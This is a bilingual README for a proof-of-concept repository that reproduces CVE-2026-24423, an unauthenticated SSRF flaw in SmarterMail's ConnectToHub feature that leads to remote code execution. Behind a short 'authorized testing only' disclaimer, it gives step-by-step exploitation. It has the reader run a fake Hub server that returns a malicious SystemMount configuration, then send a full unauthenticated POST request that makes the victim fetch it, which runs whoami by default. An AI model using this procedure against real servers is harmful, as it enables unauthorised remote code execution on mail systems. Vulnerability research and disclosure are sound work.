# CVE-2026-24423 – Reproduction
> ⚠️ **仅用于安全研究与授权测试 / For security research and authorized testing only**
## 简介(Overview)
本项目用于复现 **CVE-2026-24423** 漏洞。
该漏洞存在于 **SmarterMail ConnectToHub** 功能中,其根本原因是:
- 管理级接口未进行身份认证
- 服务端会主动连接用户指定的 Hub(SSRF)
- 外部 Hub 返回的数据被直接用于本地系统级操作
该漏洞属于**设计级信任边界破坏(Trust Boundary Violation)**,最终可能导致远程代码执行。
本仓库仅用于**漏洞验证与技术研究**,不用于武器化利用。Start Hub Simulation Server
python3 cve-2026-24423.py该脚本将:
- 监听 80 端口
- 模拟 SmarterMail Hub 接口
- 返回包含
SystemMount配置的 JSON 响应
Trigger the Vulnerable API
使用 Yakit 或 Burp Suite 发送请求:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json
{
"hubAddress": "http://ip",
"oneTimePassword": "test",
"nodeName": "victim"
}该接口无需身份认证 No authentication is required.
Troubleshooting
如果漏洞复现失败:
- 请修改
cve-2026-24423.py中的MountPath参数
Result
当漏洞触发成功时,SmarterMail 将解析 Hub 返回的数据,默认代码仅执行whoami命令。
示例截图 / Example:
本项目由ChatGPT 完成。
